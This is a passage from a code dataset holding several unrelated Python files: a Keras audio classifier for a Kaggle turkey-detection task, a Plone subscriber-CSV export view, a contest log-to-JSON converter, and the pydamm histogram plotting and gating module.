tf.keras.utils.normalize(Test_audios)\n\n return (Train_audios,Train_Y,Test_audios,Test_Y)\n\nTrain_audios,Train_Y,Test_audios,Test_Y = split(data)\n\n\n\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense,Flatten\n\n\nmodel=Sequential()\nmodel.add(Flatten())\nmodel.add(Dense(128,activation='relu'))\n#model.add(Dense(128,activation='relu'))\nmodel.add(Dense(64,activation='relu'))\n#model.add(Dense(64,activation='relu'))\nmodel.add(Dense(32,activation='relu'))\n#model.add(Dense(32,activation='relu'))\nmodel.add(Dense(1,activation='sigmoid'))\n\n#COMPILE\nmodel.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n\n#LEARNING\nmodel.fit(Train_audios,Train_Y,batch_size=4,epochs=3)\n\nTest_predict=model.predict(Test_audios)\nTest_Y_pred=np.asarray([Test_predict>0.5])\nTest_Y_pred=Test_Y_pred.reshape(Test_Y.shape)\n\nfrom sklearn.metrics import confusion_matrix\n\nconfusion_matrix(Test_Y,Test_Y_pred)\n\n\n\n##### SUBMIT DATA\ntest_data=pd.read_json('all/test.json')\ntest_audio=test_data['audio_embedding']\ntest_audio=pad_sequences(test_audio,maxlen=10)\ntest_audio=tf.keras.utils.normalize(test_audio)\n\ntestpred=model.predict(test_audio)\ntestpred=testpred.reshape(1196)\ntestypred=np.asarray([testpred>0.5])\ntestypred=testypred.reshape(1196)\n\ntest_id=test_data['vid_id']\ntest_res=np.stack( (test_id,testpred))\ntest_res=pd.DataFrame(test_res)\ntest_res=pd.DataFrame.transpose(test_res)\ntest_res.columns=['vid_id','pred']\n\nsub=pd.read_csv('all/sample_submission.csv')\n\nr=pd.merge(test_res,sub,on='vid_id')\n\nr['is_turkey']=np.where(r['pred']>0.5,1,0)\nr1=r.drop('pred',axis=1)\n\nr1.to_csv('res',index=False)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n######################################################################3\ndef extractinfo (data):\n audios=[]\n res=[]\n for i in range(len(data)):\n # info DATA\n tmpsample=data[i]\n Yturkey=tmpsample[\"is_turkey\"]\n id=tmpsample[\"vid_id\"]\n res.append([id,Yturkey])\n\n # audio DATA\n audio=tmpsample[\"audio_embedding\"]\n audios.append(audio)\n return (np.asarray(res),audios)\n\ndatainfo,audios = extractinfo(data)\n\naudio.read()\n\nres=[]\nfor i in range(len(audios)):\n audio_samp=[]\n audio=audios[i]\n for j in range(len(audio)):\n audio_samp.append(audio[j])\n res.append(audio_samp)\n\n\n\n\n\ndef 
extractaudio (audios) :\n res=[]\n for i in range(len(audios)):\n sample=audios[i]\n sample=np.asarray(sample)\n sample=sample.reshape(sample.shape[0]*sample.shape[1])\n res.append(sample)\n return res\n\naudios=extractaudio(audios)\ntest=np.array(audios)\n\nY_train=datainfo[:,1]\nY_train=Y_train.astype(np.int)\nY_train=Y_train.reshape(1195)\n\nX_train=audios\n\n\n\n\n\n\n##LETS DO SOME NEURALNET\n\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense\n\nmodel=Sequential()\nmodel.add(Dense(512,activation='relu'))\nmodel.add(Dense(1,activation='sigmoid'))\n\nmodel.compile(optimizer='adam',loss='binary_crossentropy', metrics=['accuracy'])\nmodel.fit(X_train,Y_train,batch_size=1)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"269226529","text":"import logging\n\nfrom Products.Five import BrowserView\nfrom Products.CMFCore.utils import getToolByName\n\nfrom Products.minaraad.subscriptions import SubscriptionManager\nfrom Products.minaraad.browser.utils import buildCSV\nfrom Products.minaraad.subscriptions import THEME_FILTERED\nfrom Products.minaraad.subscriptions import SUBSCRIPTIONS_EMAIL\n\nlogger = logging.getLogger('exportsubscribers')\n\n\nclass ExportSubscribersView(BrowserView):\n\n def __init__(self, *args, **kwargs):\n BrowserView.__init__(self, *args, **kwargs)\n tool = getToolByName(self.context, 'portal_url')\n portal = tool.getPortalObject()\n self.sm = SubscriptionManager(portal)\n obj = self.context.aq_explicit\n self.contenttype = obj.__class__.__name__\n\n def __call__(self):\n \"\"\"Return template with form or return csv.\"\"\"\n request = self.request\n if request.get('form.button.ExportEmail', None) is not None:\n return self.buildSubscriberCSV()\n\n return self.index(template_id='export_subscribers')\n\n def show_theme_warning(self):\n \"\"\"A theme field was added to two contenttypes, warn if it is None.\"\"\"\n if self.contenttype in ['Study', 'Advisory']:\n if self.context.getTheme() is None:\n return True\n # In all other cases, no warning is needed.\n return False\n\n def can_email(self):\n return self.contenttype in SUBSCRIPTIONS_EMAIL\n\n def buildSubscriberCSV(self):\n ploneUtils = getToolByName(self.context, 'plone_utils')\n safeSubscriberId = ploneUtils.normalizeString(self.contenttype).lower()\n\n themes = None\n if self.contenttype in THEME_FILTERED:\n themes = self.context.get_all_themes()\n\n subscribers = self.sm.emailSubscribers(self.contenttype,\n themes=themes)\n\n logger.info(\"Exporting cvs for %s subscribers for %s (themes=%r)\",\n len(subscribers), self.contenttype, themes)\n return buildCSV(self.context,\n subscribers,\n filename='%s-subscribers.csv' % safeSubscriberId)\n","sub_path":"src/Products.minaraad/Products/minaraad/browser/subscribers.py","file_name":"subscribers.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"418215137","text":"from json import dumps, load\nfrom os import path, makedirs\n\n\ndef json_input(path):\n with open(path, 'r') as f:\n return load(f)\n\n\n_params = json_input('params.json')\n\ndata_dir = _params['data_dir']\nghosts_file_path = _params['ghosts_file_path']\n\n\ndef json_output(data):\n return dumps(data, sort_keys=False, separators=(',', ':'), ensure_ascii=False)\n\n\ndef output(filename, data):\n with open(path.join(data_dir, filename), 'w') as f:\n 
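# write the compact JSON string produced by json_output above\n        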
f.write(json_output(data))\n\n\ndef ensure_dir(_path):\n    if not path.exists(_path):\n        makedirs(_path)\n\n\ndef team_out(data):\n    teams = {}\n\n    for line in data:\n        if len(line) < 3 or not (line[1] == 't' and line[2] == ' '):\n            continue\n\n        team_id = line.split(' ')[1].split(',')[0]\n        team_name = line.split(' ')[1].split(',')[3].split('(')[0]\n        team_organization = line.split('(')[1].replace(')', '')\n\n        team = {}\n        team['name'] = team_name\n        team['organization'] = team_organization\n        team['official'] = 1\n\n        teams[team_id] = team\n\n    output(\"team.json\", teams)\n\n\ndef run_out(data):\n    runs = []\n\n    for line in data:\n        if len(line) < 3 or not (line[1] == 's' and line[2] == ' '):\n            continue\n\n        line = line.split(' ')[1]\n        line = line.split(',')\n\n        team_id = line[0]\n        problem_id = ord(line[1]) - ord('A')\n        timestamp = line[3]\n        status = line[4]\n        if status == \"OK\":\n            status = \"correct\"\n        else:\n            status = \"incorrect\"\n\n        run = {}\n        run[\"team_id\"] = team_id\n        run[\"timestamp\"] = int(timestamp) // 60 * 60\n        run[\"status\"] = status\n        run[\"problem_id\"] = problem_id\n\n        runs.append(run)\n\n    output(\"run.json\", runs)\n\n\nwith open(ghosts_file_path, 'r', encoding=\"utf-8\") as f:\n    data = f.read().split(\"\\n\")\n\nensure_dir(data_dir)\nteam_out(data)\nrun_out(data)\n","sub_path":"spider-examples/cf-ghosts/sync.py","file_name":"sync.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}\n+{"seq_id":"88579610","text":"#!/usr/bin/env python3\n\"\"\"K. Miernik 2012\nk.a.miernik@gmail.com\nDistributed under GNU General Public Licence v3\n\nThis module is intended to be loaded in an interactive interpreter session.\nIPython is strongly recommended. pydamm is a Python replacement for the\nDAMM program.\n\n\"\"\"\n\nimport math\nimport numpy as np\nimport sys\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nimport re\n\nfrom collections import deque\n\"\"\"\nfrom Pyspectr import hisfile as hisfile\nfrom Pyspectr import histogram as histogram\nfrom Pyspectr import plotter as plotter\nfrom Pyspectr.exceptions import GeneralError as GeneralError\n\"\"\"\nimport local_hisfile as hisfile\nimport local_histogram as histogram\nimport local_plotter as plotter\nfrom Pyspectr.exceptions import GeneralError\nfrom Pyspectr.decay_fitter import DecayFitter as DecayFitter\nfrom Pyspectr.peak_fitter import PeakFitter as PeakFitter\n\n\nclass Plot:\n    \"\"\"\n    The Plot class holds a set of data and parameters that are needed to\n    display the data. 
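For example, a Plot built by e.d(100, bin_size=2) (histogram id assumed) is displayed with two-channel binning while the wrapped histogram keeps its raw counts.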
\n\n The bin_size attribute defines how much the histogram should be binned\n The norm attribute defines the normalization parameter used\n\n These parameters are altering the display only, the histogram \n always keeps the original data.\n\n If the binned or normalized histogram data are needed for direct\n access, use functions avaible in the Histogram class.\n\n The mode defines the way the data are presented,\n 'histogram' is displayed with steps-mid\n 'function' with continuus line\n 'errorbar' with yerrorbars\n 'map' for 2D histograms\n\n \"\"\"\n\n def __init__(self, histogram, mode, active):\n self.histogram = histogram\n self.mode = mode\n self.active = active\n\n self._bin_size = 1\n self._norm = 1\n\n\n @property\n def bin_size(self):\n return self._bin_size\n\n\n @bin_size.setter\n def bin_size(self, bs):\n if self.histogram.dim != 1:\n raise GeneralError('Currently only 1D histograms can be binned')\n\n if isinstance(bs, int):\n # You can only bin further the histogram, there is no\n # way back (load original data again)\n if bs > self._bin_size:\n self._bin_size = bs\n self.histogram = self.histogram.rebin1d(bs)\n elif bs <= self._bin_size:\n pass\n else:\n raise GeneralError('Attempt to set bin size to {}'.\\\n format(bs))\n else:\n raise GeneralError('Attempt to set bin size to {}'.\\\n format(bs))\n\n\n @property\n def norm(self):\n return self._norm\n\n\n @norm.setter\n def norm(self, n):\n if self.histogram.dim != 1:\n raise GeneralError('Currently only 1D histograms can be normalized')\n self.histogram = self.histogram.normalize1d(n, self.bin_size)\n\n\n\n def __str__(self):\n \"\"\"Basic information Informative string\"\"\"\n string = 'Plot: {} bin {} norm {:.2e}'.\\\n format(self.histogram.title.strip(), self.bin_size,\n self.norm)\n return string\n\n\n def __repr__(self):\n \"\"\"More verbose string\n\n \"\"\"\n string = 'Plot: \"{}\" bin {} norm {:.2e} active {} mode {}'.\\\n format(self.histogram.title.strip(), self.bin_size,\n self.norm, self.active, self.mode)\n return string\n\n\n\nclass Experiment:\n \"\"\"Main class for data visualization and analysis\n\n \"\"\"\n # Deque lengths\n FIFO_1D = 50\n FIFO_2D = 5\n\n # These variables and registers are class wide, so\n # if more than one Experiment is open (one file = one Experiment)\n # they share the registers and auto-scaling is still working\n\n # Keeps current and past 1D plots\n # The right-most item is the current one\n plots = deque(maxlen=FIFO_1D)\n\n # Current and past 2D plots\n maps = deque(maxlen=FIFO_2D)\n\n # 1D plot ranges\n xlim = None\n ylim = None\n\n # 2D plot ranges\n xlim2d = None\n ylim2d = None\n logz = False\n\n # 1 for 1D, 2 for 2D\n _mode = 1\n\n\n def __init__(self, file_name, size=11):\n \"\"\"Initialize, open data file (his) and open plot window\n (size parameter decides on plot dimensions)\n\n \"\"\"\n self.file_name = file_name\n # The current (active) file\n self.hisfile = None\n self.load(file_name)\n\n # Peaks for fitting\n self.peaks = []\n \n # plotter front-end\n self.plotter = plotter.Plotter(size)\n\n\n def load(self, file_name):\n \"\"\"Load his file (also tar gzipped files)\"\"\"\n self.hisfile = hisfile.HisFile(file_name)\n\n\n @property\n def mode(self):\n \"\"\" 1D or 2D plotting mode\"\"\"\n return Experiment._mode\n\n\n @mode.setter\n def mode(self, mode):\n \"\"\"Deactivate all plots that have different mode (dimension)\"\"\"\n if mode not in [1, 2]:\n raise GeneralError('Only 1D and 2D plotting modes are possible')\n\n if mode == 2:\n self.plotter.ylin()\n\n 
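# record the chosen mode class-wide; plots of the other dimension are deactivated below\n        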
Experiment._mode = mode\n for p in self.plots:\n if p.histogram.dim != mode:\n p.active = False\n\n\n def _replace_latex_chars(self, text):\n \"\"\"Clear text from characters that are not accepted by latex\"\"\"\n replace_chars = [['_', '-'],\n ['$', '\\$'],\n ['%', '\\%'],\n ['~', ' '],\n ['\"', \"''\"],\n ['\\\\', ' ']]\n replaced_text = text\n for r_ch in replace_chars:\n replaced_text = replaced_text.replace(r_ch[0], r_ch[1])\n return replaced_text\n\n\n def show_registers(self):\n \"\"\"Print the available registers\"\"\"\n i = -1\n print('1D histograms')\n print('{: <3} {: ^40} {: ^5} {: ^8} {: ^8}'.\\\n format('i', 'Title', 'Bin', 'Norm', 'Active'))\n print('-' * 79)\n\n for p in reversed(Experiment.plots):\n print('{: >3} {: <40} {: >5} {: >5.2e} {: >5}'.\\\n format(i, p.histogram.title[:40], p.bin_size,\n p.norm, p.active))\n i -= 1\n print()\n\n i = -1\n print('2D histograms')\n print('{: <3} {: ^40} {: ^5} {: ^8} {: ^8}'.\\\n format('i', 'Title', 'Bin', 'Norm', 'Active'))\n print('-' * 79)\n\n for p in reversed(Experiment.maps):\n print('{: >3} {: <40} {: >5} {: >5.2e} {: >5}'.\\\n format(i, p.histogram.title[:40], p.bin_size,\n p.norm, p.active))\n i -= 1\n print()\n\n\n def _expand_norm(self, norm, num_of_args):\n \"\"\"Return normalization array of lenght equal to \n num_of_args, expand integers to whole array, check \n if list is of proper lenght\n\n \"\"\"\n normalization = []\n if isinstance(norm, str):\n if norm.lower() == 'area':\n for i in range(num_of_args):\n normalization.append('area')\n else:\n print(\"Normalization must be a float, \",\n \"list of floats or a 'area' string\")\n return None\n elif isinstance(norm, float) or isinstance(norm, int):\n for i in range(num_of_args):\n normalization.append(norm)\n elif isinstance(norm, list):\n if len(norm) == num_of_args:\n normalization = norm\n else:\n print('List of normalization factors must be of the same' +\n ' length as the list of histograms')\n return None\n else:\n print(\"Normalization must be a float, \",\n \"list of floats or a 'area' string\")\n print(norm, ' was given')\n return None\n return normalization\n\n\n def _expand_bin_sizes(self, bin_size, num_of_args):\n \"\"\"See _expand_norm\"\"\"\n bin_sizes = []\n if isinstance(bin_size, int):\n for i in range(num_of_args):\n bin_sizes.append(bin_size)\n elif isinstance(bin_size, list):\n if len(bin_size) == num_of_args:\n bin_sizes = bin_size\n else:\n print('List of bin sizes must be of the same' +\n ' length as the list of histograms')\n return None\n else:\n print(\"Bin size must be an int or a list of ints\")\n return None\n return bin_sizes\n\n\n def _expand_d_args(self, args):\n \"\"\"Expand list of args to a list of histograms ids or Plot\n instances\"\"\"\n his_list = []\n for his in args:\n if isinstance(his, int):\n his_list.append(his)\n elif isinstance(his, str):\n try:\n his_range = his.split('-')\n his_range = [x for x in range(int(his_range[0]),\n int(his_range[1]) + 1)]\n his_list += his_range\n except (ValueError, IndexError):\n break\n elif isinstance(his, Plot):\n his_list.append(his)\n else:\n break\n else:\n return his_list\n print(\"Histogram list must be given in a 'x-y' format,\",\n \"where x and y are integers\",\n \"(note also quotation marks), e.g. '100-115'\")\n return None\n\n\n\n def d(self, *args, norm=1, bin_size=1, clear=True, linlog='lin'):\n \"\"\"\n Plot 1D histogram. 
\n * args: is a list of histograms that may be given as:\n - positive integer: is interpreted as the histogram id\n from a currently open file\n - negative integer: is interpreted as the registry number\n (see (show_registers())\n - Plot object: see Plot class\n - string: in 'x-y' format where x and y are integers \n (note also mandatory quatation marks)\n is interpreted as a range of histograms ids\n\n * norm: may be given as a single float or int value or an 'area' string,\n also a list of length matching the *args list may be used\n with any combination of the above accepted values\n * bin_size: must be an integer, a list of ints is \n also accepted (see norm)\n * clear: is True by default, which means that previous plot is \n cleared if False is given, the previous plots are not cleared.\n\n Example:\n e.d(100, plot1, '105-106', -3, bin_size=[1, 2, 1, 1, 10], clear=False)\n\n \"\"\"\n plots = []\n\n his_list = self._expand_d_args(args)\n\n normalization = self._expand_norm(norm, len(his_list))\n if normalization is None:\n return None\n\n bin_sizes = self._expand_bin_sizes(bin_size, len(his_list))\n if bin_sizes is None:\n return None\n\n # Clear the plotting area (of clear is False, the currently\n # active plots are not deactivated, so they got replotted at\n # the end of this function)\n self.plotter.clear()\n\n # Switch mode to 1D\n self.mode = 1\n # Deactivate current plots if clear flag is used\n if clear:\n for p in Experiment.plots:\n p.active = False\n\n # Prepare data for plotting\n for i_plot, his in enumerate(his_list):\n if isinstance(his, int):\n # load histograms from the file\n if his > 0:\n data = self.hisfile.load_histogram(his)\n if data[0] != 1:\n print('{} is not a 1D histogram'.format(his))\n return None\n title = self.hisfile.histograms[his]['title'].strip()\n title = '{}:{}'.format(his, \n self._replace_latex_chars(title))\n histo = histogram.Histogram()\n histo.title = title\n histo.x_axis = data[1]\n histo.weights = data[3]\n histo.errors = self._standard_errors_array(data[3])\n plot = Plot(histo, 'histogram', True)\n plot.bin_size = bin_sizes[i_plot]\n plot.norm = normalization[i_plot]\n plots.append(plot)\n Experiment.plots.append(plot)\n else:\n # plot histograms from registry\n # Numbered by negative numbers (-1 being the latest)\n # Call show_registers for a list of available plots\n try:\n plot = Experiment.plots[his]\n Experiment.plots[his].active = True\n Experiment.plots[his].bin_size = bin_sizes[i_plot]\n Experiment.plots[his].norm = normalization[i_plot]\n except IndexError:\n print('There is no plot in the registry under the',\n 'number', his, 'use show_registry() to see',\n 'available plots')\n return None\n plots.append(plot)\n elif isinstance(his, Plot):\n # If instance of Plot class is given, mark it active and add\n # to the deque (if not already there)\n # and to the array to be returned at the end\n his.active = True\n his.bin_size = bin_sizes[i_plot]\n his.norm = normalization[i_plot]\n plots.append(his)\n if his not in Experiment.plots:\n Experiment.plots.append(his)\n\n # Count the number of active plots\n active_plots = 0\n for plot in Experiment.plots:\n if plot.active:\n active_plots += 1\n\n # Here the actual plotting happens\n i_plot = 0\n for plot in Experiment.plots:\n if plot.active:\n i_plot += 1\n # If ylim is not given explicitely, go through the\n # active plots to find the plot limits\n # This is run only for the last plot.\n # Note that this is neccesary as matplotlib is not\n # autoscaling Y axis when \n # changing the X 
axis is being changed\n # If, in a future, the behaviour of matplotlib\n # changes, this part may dropped\n ylim = None\n if self.ylim is None and i_plot == active_plots:\n ylim = self._auto_scale_y()\n else:\n ylim = self.ylim\n\n # Note that ylim is autoscaled above if self.ylim is None\n # But we still keep self.ylim None, \n # to indicate autoscaling\n self.plotter.plot1d(plot, Experiment.xlim, ylim)\n if linlog=='lin':\n self.lin()\n else:\n self.log()\n\n # Return plots that were added or activated\n return plots\n\n\n def _auto_scale_y(self):\n \"\"\"Find the y limits taking into account all active plots \"\"\"\n ylim = [None, None]\n for p in Experiment.plots:\n if p.active:\t\n histo = p.histogram\n #if p.bin_size > 1:\n #histo = histo.rebin1d(p.bin_size)\n #if p.norm != 1:\n #histo = histo.normalize1d(p.norm, p.bin_size)\n if Experiment.ylim is None:\n #if Experiment.xlim is None: ORIGINAL----> TYPO, SHOULD BE YLIM NOT XLIM\n ymin = min(histo.weights)\n ymax = max(histo.weights[1:])\n #ORIGINAL IS BELOW, THE ZEROTH POSITION IS FULL OF ZEROS AND SKEWS THE AXIS WAY UP\n #ymax = max(histo.weights)\n else:\n i_xmin = Experiment.xlim[0] // p.bin_size - 1\n if i_xmin < 0:\n i_xmin = 0\n i_xmax = Experiment.xlim[1] // p.bin_size + 1\n try:\n ymin = min(histo.weights[i_xmin:i_xmax])\n except ValueError:\n ymin = None\n try:\n ymax = max(histo.weights[i_xmin:i_xmax])\n except ValueError:\n ymax = None\n if ymin is not None:\n if ylim[0] is not None:\n if ymin < ylim[0]:\n ylim[0] = ymin\n else:\n ylim[0] = ymin\n if ymax is not None:\n if ylim[1] is not None:\n if ymax > ylim[1]:\n ylim[1] = ymax\n else:\n ylim[1] = ymax\n if ylim[0] is None or ylim[1] is None:\n return None\n else:\n #return [ylim[0] - ylim[0] * 0.1, ylim[1] + ylim[1] * 0.1]\n return [ylim[0] - ylim[0], ylim[1] + (0.1*ylim[1])]\n\n\n def _auto_scale_x(self):\n \"\"\"Find the x axis limits taking into account all active plots.\"\"\"\n xlim = [None, None]\n for p in Experiment.plots:\n if p.active:\n histo = p.histogram\n if Experiment.xlim is None:\n xmin = histo.x_axis[0]\n xmax = histo.x_axis[-1]\n if xlim[0] is not None:\n if xmin < xlim[0]:\n xlim[0] = xmin\n else:\n xlim[0] = xmin\n if xlim[1] is not None:\n if xmax > xlim[1]:\n xlim[1] = xmax\n else:\n xlim[1] = xmax\n\n if xlim[0] is None or xlim[1] is None:\n return None\n else:\n return xlim\n\n\n def dl(self, x0=None, x1=None):\n \"\"\"Change x range of 1D histogram\"\"\"\n if self.mode != 1:\n return None\n\n if x0 is None or x1 is None:\n Experiment.xlim = None\n self.plotter.xlim(self._auto_scale_x())\n else:\n Experiment.xlim = (x0, x1)\n self.plotter.xlim(Experiment.xlim)\n\n if self.ylim is None:\n self.plotter.ylim(self._auto_scale_y())\n\n\n def dmm(self, y0=None, y1=None):\n \"\"\"Change yrange of 1D histogram \"\"\"\n if self.mode != 1:\n return None\n\n if y0 is None or y1 is None:\n self.ylim = None\n else:\n self.ylim = (y0, y1)\n\n if self.ylim is None:\n self.plotter.ylim(self._auto_scale_y())\n else:\n self.plotter.ylim(self.ylim)\n\n\n def log(self):\n \"\"\"Change y scale to log or z scale to log\"\"\"\n if self.mode == 1:\n self.plotter.ylog()\n self.dl()\n elif self.mode == 2:\n Experiment.logz = True\n self.dd(-1, xc=Experiment.xlim2d, yc=Experiment.ylim2d)\n\n def lin(self):\n \"\"\"Change y scale to linear or z scale to linear\"\"\"\n if self.mode == 1:\n self.plotter.ylin()\n self.dl()\n if self.mode == 2:\n Experiment.logz = False\n self.dd(-1, xc=Experiment.xlim2d, yc=Experiment.ylim2d)\n\n\n def list(self, his_id=None):\n \"\"\"List 
all histograms in the active data file\n or details on a selected histogram. Now accepts '1d','1D','2d',\n or '2D' as input for listing all 1 or 2 dimensional histograms. \n Now also implements re to query the list (case insensitive)\"\"\"\n if his_id is None:\n for key in sorted(self.hisfile.histograms.keys()):\n print('{: <6} {}'.format(key, \n self.hisfile.histograms[key]['title']))\n elif isinstance(his_id, str):\n if his_id is '1d' or his_id is'1D':\n for key in sorted(self.hisfile.histograms.keys()):\n if self.hisfile.histograms[key]['dimension']==1:\n print('{: <6} {}'.format(key, \n self.hisfile.histograms[key]['title']))\n elif his_id is '2d' or his_id is'2D':\n for key in sorted(self.hisfile.histograms.keys()):\n if self.hisfile.histograms[key]['dimension']==2:\n print('{: <6} {}'.format(key, \n self.hisfile.histograms[key]['title']))\n else:\n for key in sorted(self.hisfile.histograms.keys()):\n if re.search(his_id,self.hisfile.histograms[key]['title'],re.I)!=None:\n print('{: <6} {}'.format(key, \n self.hisfile.histograms[key]['title']))\n else:\n try:\n dim = self.hisfile.histograms[his_id]['dimension']\n xmin = []\n xmax = []\n for i in range(dim):\n xmin.append(self.hisfile.histograms[his_id]['minc'][0])\n xmax.append(self.hisfile.histograms[his_id]['maxc'][0])\n print('{: <10} : {}'.format('ID', his_id))\n print('{: <10} : {}'.format('Title', \n self.hisfile.histograms[his_id]['title']))\n print('{: <10} : {}'.format('Dimensions', dim))\n print('{: <10} : ({}, {})'.format('X range', xmin[0], xmax[0]))\n if dim > 1:\n print('{: <10} : ({}, {})'.format('Y range', \n xmin[1], xmax[1]))\n except KeyError:\n print('Histogram id = {} not found'.format(his_id))\n\n def _standard_errors_array(self, data):\n \"\"\" Calculate standard error array (\\sigma_i = \\sqrt{n_i}),\n with a twist: if n_i = 0, the uncertainity is 1 (not 0)\n\n \"\"\"\n errors = np.zeros(data.shape)\n for index, d in np.ndenumerate(data):\n if d == 0:\n errors[index] = 1\n else:\n errors[index] = math.sqrt(abs(d))\n return errors\n\n\n def _add_errors(self, error1, error2):\n \"\"\"Add two error arrays\n \\sigma = \\sqrt{\\sigma_1^2 + \\sigma_2^2}\n\n \"\"\"\n if error1.shape != error2.shape:\n raise GeneralError('Shape of array mismatches')\n errors = np.zeros(error1.shape)\n for index, d in np.ndenumerate(error1):\n errors[index] = math.sqrt(error1[index]**2 + error2[index]**2)\n return errors\n\n\n def gx(self, his, gate_x, gate_y=None, bg_gate=None, norm=1,\n bin_size=1, clear=True, plot=True):\n \"\"\"Make projection on Y axis of 2D histogram with gate\n set on X (gate_x) and possibly on Y (gate_y)\n\n his: is a histogram id in a file\n gate_x: is range of bins in (x0, x1) format, this selects the\n range of X columns to be projected on Y axis\n gate_y: is a range of bins in (y0, y1) format (optional), this\n truncates the range of the projection along the Y axis\n bg_gate: is a range of bins in (x0, x1) format (optional), this\n selects the background gate that is subtracted from the\n selected gate_x\n norm: normalization factor (see d())\n bin_size: binning factor (see d())\n clear: True by default, clears previous plots\n plot: True by default, if False no plotting is taking place, \n only the plot object is being returned\n \n \"\"\"\n if gate_x is None or len(gate_x) != 2:\n print('Please select gate on X in a (min, max) format')\n return None\n if gate_y is not None and len(gate_y) != 2:\n print('Please select gate on Y in a (min, max) format')\n return None\n\n # If clear flag used, clear the 
plotting area\n if clear and plot:\n self.plotter.clear()\n\n # Switch mode to 1D\n self.mode = 1\n # Deactivate all plots if clear flag is used\n if clear and plot:\n for p in Experiment.plots:\n p.active = False\n\n data = self.hisfile.load_histogram(his)\n if data[0] != 2:\n print('{} is not a 2D histogram'.format(his))\n return None\n\n # x for x_axis data\n # y for y_axis data\n # w for weights\n # g for gate (result)\n # bg for background gate\n x = data[1]\n y = data[2]\n w = data[3]\n if gate_y is None:\n gate_y = [0, len(y)-2]\n y = y[gate_y[0]:gate_y[1]+1]\n g = w[gate_x[0]:gate_x[1]+1, gate_y[0]:gate_y[1]+1].sum(axis=0)\n dg = self._standard_errors_array(g)\n if bg_gate is not None:\n if (bg_gate[1] - bg_gate[0]) != (gate_x[1] - gate_x[0]):\n print('#Warning: background and gate of different widths')\n bg = w[bg_gate[0]:bg_gate[1]+1, gate_y[0]:gate_y[1]+1].sum(axis=0)\n g = g - bg\n # Note that since the gate is adding bins, the formula\n # used for standard error is no longer valid\n # This approximation should be good enough though\n dbg = self._standard_errors_array(bg)\n dg = self._add_errors(dg, dbg)\n\n title = '{}:{} gx({},{})'.format(his, self.hisfile.\\\n histograms[his]['title'].strip(),\n gate_x[0], gate_x[1])\n if bg_gate is not None:\n title += ' bg ({}, {})'.format(bg_gate[0], bg_gate[1])\n title = self._replace_latex_chars(title)\n\n histo = histogram.Histogram()\n histo.title = title\n histo.x_axis = y\n histo.weights = g\n histo.errors = dg\n gate_plot = Plot(histo, 'histogram', True)\n gate_plot.bin_size = bin_size\n gate_plot.norm = norm\n\n if plot:\n Experiment.plots.append(gate_plot)\n ylim = None\n if self.ylim is None:\n ylim = self._auto_scale_y()\n else:\n ylim = self.ylim\n self.plotter.plot1d(gate_plot, Experiment.xlim, ylim)\n\n return gate_plot\n\n\n def gy(self, his, gate_y, gate_x=None, bg_gate=None, norm=1,\n bin_size=1, clear=True, plot=True):\n \"\"\"Make projection on X axis of 2D histogram with gate\n set on Y (gate_y) and possibly on X (gate_x)\n \n see gx for more details\n \"\"\"\n if gate_y is None or len(gate_y) != 2:\n print('Please select gate on Y in a (min, max) format')\n return None\n if gate_x is not None and len(gate_x) != 2:\n print('Please select gate on X in a (min, max) format')\n return None\n\n # If clear flag used, clear the plotting area\n if clear and plot:\n self.plotter.clear()\n\n # Switch mode to 1D\n self.mode = 1\n # Deactivate all plots if clear flag is used\n if clear and plot:\n for p in Experiment.plots:\n p.active = False\n\n data = self.hisfile.load_histogram(his)\n if data[0] != 2:\n print('{} is not a 2D histogram'.format(his))\n return None\n\n # x for x_axis data\n # y for y_axis data\n # w for weights \n # g for gate (result)\n # bg for background gate\n x = data[1]\n y = data[2]\n w = data[3]\n if gate_x is None:\n gate_x = [0, len(x)-2]\n x = x[gate_x[0]:gate_x[1]+1]\n g = w[gate_x[0]:gate_x[1]+1, gate_y[0]:gate_y[1]+1].sum(axis=1)\n dg = self._standard_errors_array(g)\n if bg_gate is not None:\n if (bg_gate[1] - bg_gate[0]) != (gate_y[1] - gate_y[0]):\n print('#Warning: background and gate of different widths')\n\n bg = w[gate_x[0]:gate_x[1]+1, bg_gate[0]:bg_gate[1]+1].sum(axis=1)\n g = g - bg\n # Note that since the gate is adding bins, the formula\n # used for standard error is no longer valid\n # This approximation should be good enough though\n dbg = self._standard_errors_array(bg)\n dg = self._add_errors(dg, dbg)\n\n title = '{}:{} gy({},{})'.format(his, self.hisfile.\\\n 
histograms[his]['title'].strip(),\n gate_y[0], gate_y[1])\n if bg_gate is not None:\n title += ' bg ({}, {})'.format(bg_gate[0], bg_gate[1])\n title = self._replace_latex_chars(title)\n\n histo = histogram.Histogram()\n histo.title = title\n histo.x_axis = x\n histo.weights = g\n histo.errors = dg\n gate_plot = Plot(histo, 'histogram', True)\n gate_plot.bin_size = bin_size\n gate_plot.norm = norm\n\n Experiment.plots.append(gate_plot)\n if plot:\n ylim = None\n if self.ylim is None:\n ylim = self._auto_scale_y()\n else:\n ylim = self.ylim\n self.plotter.plot1d(gate_plot, Experiment.xlim, ylim)\n\n return gate_plot\n\n\n def mark(self, x_mark):\n \"\"\"Put vertical line on plot to mark the peak (or guide the eye)\"\"\"\n plt.axvline(x_mark, ls='--', c='black')\n\n\n def annotate(self, x, text, shiftx=0, shifty=0):\n \"\"\" Add arrow at x, with annotation text\"\"\"\n if self.mode != 1:\n print('Annotation works only for 1D histograms')\n return None\n\n length = 0.07 * (plt.ylim()[1] - plt.ylim()[0])\n y = self.plots[-1].histogram.weights[x // self.plots[-1].bin_size]\n plt.annotate(text, xy=(x, y),\n xytext=(x + shiftx, y + length + shifty),\n rotation=90.,\n xycoords='data',\n fontsize=9,\n verticalalignment='bottom',\n horizontalalignment='center',\n arrowprops=dict(width=1, facecolor='black', headwidth=5,\n shrink=0.1))\n\n\n def load_gates(self, filename):\n \"\"\"Load gamma gates from text file, the format is:\n # Comment line\n Name x0 x1 bg0 bg1\n Example:\n 110 111 113 115 